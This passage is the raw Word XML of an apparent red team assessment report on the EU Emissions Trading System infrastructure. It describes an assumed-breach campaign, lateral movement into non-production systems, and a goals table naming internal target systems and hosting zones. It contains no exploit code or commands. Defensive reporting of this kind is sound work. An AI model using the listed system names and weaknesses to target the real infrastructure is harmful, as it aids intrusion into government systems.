      <w:r w:rsidR="000F3DE9" w:rsidRPr="001019D3">
        <w:t>generated</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> specifically for th</w:t>
      </w:r>
      <w:r w:rsidR="00A27448" w:rsidRPr="001019D3">
        <w:t>is engagement</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">. This data </w:t>
      </w:r>
      <w:r w:rsidR="000F3DE9" w:rsidRPr="001019D3">
        <w:t>simulate</w:t>
      </w:r>
      <w:r w:rsidR="00A27448" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="000F3DE9" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> sensitive data that adversaries would typically target in real-world attack scenario</w:t>
      </w:r>
      <w:r w:rsidR="00DE393F" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="000F3DE9" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>did not contain any real</w:t>
      </w:r>
      <w:r w:rsidR="000F3DE9" w:rsidRPr="001019D3">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> production or business-related information</w:t>
      </w:r>
      <w:r w:rsidR="000F3DE9" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB3868B" w14:textId="3E6C70F6" w:rsidR="00D02E92" w:rsidRPr="001019D3" w:rsidRDefault="00D02E92" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Detailed information </w:t>
      </w:r>
      <w:r w:rsidR="00A27448" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">on the organisation of the campaign </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">is documented </w:t>
      </w:r>
      <w:r w:rsidR="00A27448" w:rsidRPr="001019D3">
        <w:t>and agreed by all stakeholder</w:t>
      </w:r>
      <w:r w:rsidR="00E76B76" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A27448" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">in the Statement of Work </w:t>
      </w:r>
      <w:r w:rsidR="00421B5F" w:rsidRPr="001019D3">
        <w:rPr>
          <w:rStyle w:val="MacroTextChar"/>
        </w:rPr>
        <w:t>SoW_SASIST-2263_CLIMA-ETS_v1.1.pdf</w:t>
      </w:r>
      <w:r w:rsidR="00A1621A" w:rsidRPr="001019D3">
        <w:rPr>
          <w:rStyle w:val="MacroTextChar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB1579F" w14:textId="74666007" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00437E8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc212654625"/>
      <w:bookmarkStart w:id="48" w:name="_Toc213253531"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Outcome</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="30CB88BB" w14:textId="3641C297" w:rsidR="00332BC0" w:rsidRPr="001019D3" w:rsidRDefault="00332BC0" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">After more than 7 months of testing, the Red Team operators demonstrated that an adversary targeting ETS and its internal infrastructure e.g. through the </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>simulated phishing campaign</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> could </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>potentially gain initial access</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> through initial user compromise and move laterally to further compromise internal ETS systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B494C6C" w14:textId="2DCEC92A" w:rsidR="00332BC0" w:rsidRPr="001019D3" w:rsidRDefault="00332BC0" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="002C482F" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">main focus of the campaign was on the </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>‘assumed breach’ scenario</w:t>
      </w:r>
      <w:r w:rsidR="002C482F" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>simulate</w:t>
      </w:r>
      <w:r w:rsidR="002C482F" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> a successful phishing attack that compromised an active account and corporate laptop with access to the internal </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">EC </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">network. From the internal network it was possible to observe </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EUTL</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> pre-production</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> business operations, by exploiting vulnerabilities on </w:t>
      </w:r>
      <w:r w:rsidR="007455CA" w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>non-production</w:t>
      </w:r>
      <w:r w:rsidR="007455CA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">EUTL </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>systems</w:t>
      </w:r>
      <w:r w:rsidR="007455CA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> (production systems were out of scope and not touched</w:t>
      </w:r>
      <w:r w:rsidR="00BC1BFC" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> except with explicit approval from DG CLIMA</w:t>
      </w:r>
      <w:r w:rsidR="007455CA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t>in basic hosting services (BHS).</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Initial access to ETS systems </w:t>
      </w:r>
      <w:r w:rsidR="000A3C26" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">such as EUCR </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">in Secure Hosting Services (SHS) was not possible, so that a </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">white card was </w:t>
      </w:r>
      <w:r w:rsidR="000A3C26" w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>issued</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A3C26" w:rsidRPr="001019D3">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> simulate a compromised machine </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inside SHS</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t>. This level of access allow</w:t>
      </w:r>
      <w:r w:rsidR="000A3C26" w:rsidRPr="001019D3">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> exploitation of vulnerabilities on </w:t>
      </w:r>
      <w:r w:rsidR="000A3C26" w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>non-production</w:t>
      </w:r>
      <w:r w:rsidR="000A3C26" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t>servers</w:t>
      </w:r>
      <w:r w:rsidR="007455CA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> (production systems were out of scope and not touched)</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, that allowed the Red Team to achieve some of </w:t>
      </w:r>
      <w:r w:rsidR="000A3C26" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">the goals and </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t>objectives</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to collect </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>non-sensitive</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> data which were fictional data deployed in the environment as flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16058096" w14:textId="26D8D70A" w:rsidR="00332BC0" w:rsidRPr="001019D3" w:rsidRDefault="00332BC0" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Overall, the Red Team was able to accomplish </w:t>
      </w:r>
      <w:r w:rsidR="000A3C26" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">a small </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">number of </w:t>
      </w:r>
      <w:r w:rsidR="000A3C26" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">tactics and </w:t>
      </w:r>
      <w:r w:rsidR="00634528" w:rsidRPr="001019D3">
        <w:t>techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, mapped to the MITRE ATT&amp;CK matrix, that were mainly related to the infrastructure and </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to the E</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t>TS</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> application layer. The security posture of E</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t>TS</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> infrastructure by the end of the assessment was considered as </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>secure</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>, but it could be furtherly improved by implementing the recommendations provided in this report</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B57" w:rsidRPr="001019D3">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> focusing on the detection capabilities of the Blue Team, responsible for monitoring and detections of IT security issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799B8BBF" w14:textId="77777777" w:rsidR="00437E8D" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00437E8D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc212654626"/>
      <w:bookmarkStart w:id="50" w:name="_Toc213253532"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Skill level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="5F4D0CD5" w14:textId="04670EC6" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00437E8D" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Most of the exploits and tools required to perform the attacks described in this report are publicly available and can be used or abused by malicious entities of variable skillset. The technical skill level required to conduct the individual actions identified ranges from </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unsophisticated to limited</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AE76E8" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72">
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB87CD" w14:textId="77777777" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00237057" w:rsidP="00237057">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc212654627"/>
      <w:bookmarkStart w:id="52" w:name="_Toc213253533"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Goals and objectives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="7E181BB8" w14:textId="7E63FED7" w:rsidR="0009317D" w:rsidRPr="001019D3" w:rsidRDefault="00812409" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The table below shows the outcome of each goal and objective defined for the Red Team campaign. A result marked as “Success” indicates that the Red Team was able to achieve the objective, demonstrating a risk or weakness:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6787"/>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="985"/>
      </w:tblGrid>
      <w:tr w:rsidR="00237057" w:rsidRPr="001019D3" w14:paraId="4DE00F7E" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:trHeight w:val="106"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="4C2D035B" w14:textId="77777777" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00237057" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Goals &amp; Objectives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="75E6A67A"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b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defined By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="2C8D9028"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b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00237057" w:rsidRPr="001019D3" w14:paraId="6F5C2EBF" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27BF411F" w14:textId="7165393F" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00587220" w:rsidP="00587220">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1582"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BHS – ETS service desk SFTP for EUCR extract application (PROD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F320EC3"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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="6E6D3A22"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237057" w:rsidRPr="001019D3" w14:paraId="6D340588" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E7A5417" w14:textId="74864821" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00587220" w:rsidP="00587220">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AWS – SRV4DEV AWS GitLab code repo/CI system (PROD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75F8D630"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FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="663DD57D"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237057" w:rsidRPr="001019D3" w14:paraId="3C8F6BE0" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FC52C89" w14:textId="282F6600" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00587220" w:rsidP="00332BC0">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SHS – TMS database (PROD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A4A86F8" w14:textId="00EA6784" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00587220" w:rsidP="004A6BBF">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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="2828B408" w14:textId="77777777" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00237057" w:rsidP="004A6BBF">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237057" w:rsidRPr="001019D3" w14:paraId="785584A5" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="652A4976" w14:textId="1B555586" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00587220" w:rsidP="00332BC0">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DWP – CLIMA Digital Workspace “S:” drive (PROD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="225132F3" w14:textId="0DBBF648" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00587220" w:rsidP="004A6BBF">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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="201C4A27" w14:textId="7664E550" w:rsidR="00237057" w:rsidRPr="001019D3" w:rsidRDefault="00BE2A8B" w:rsidP="004A6BBF">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0B0812" w:rsidRPr="001019D3" w14:paraId="335E0AAE" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6440C623" w14:textId="7191CD56" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="00332BC0">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SHS – Union Registry Administration tool or “URA” (ACC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23FE0A74" w14:textId="7EE3E12C"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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="63E3C088" w14:textId="77A53D01" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812"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0B0812" w:rsidRPr="001019D3" w14:paraId="01A1C6BF" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37D4F035" w14:textId="44CF9D67" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="00332BC0">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SHS – EUCR (ACC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F0FF445" w14:textId="07425DF5"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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="221B0529" w14:textId="77827FBF" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812"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0B0812" w:rsidRPr="001019D3" w14:paraId="5EBE6AD0" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1BC462" w14:textId="523012CB" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="00332BC0">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SHS – EUCR, JBPM, EUCR Web services database (ACC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4049B87F" w14:textId="08F02C03"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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="6737B242" w14:textId="28F36B0A" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812"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0B0812" w:rsidRPr="001019D3" w14:paraId="20680AAE" w14:textId="77777777" w:rsidTr="00332BC0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D8B3579" w14:textId="5451728F" w:rsidR="000B0812" w:rsidRPr="001019D3" w:rsidRDefault="000B0812" w:rsidP="00332BC0">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
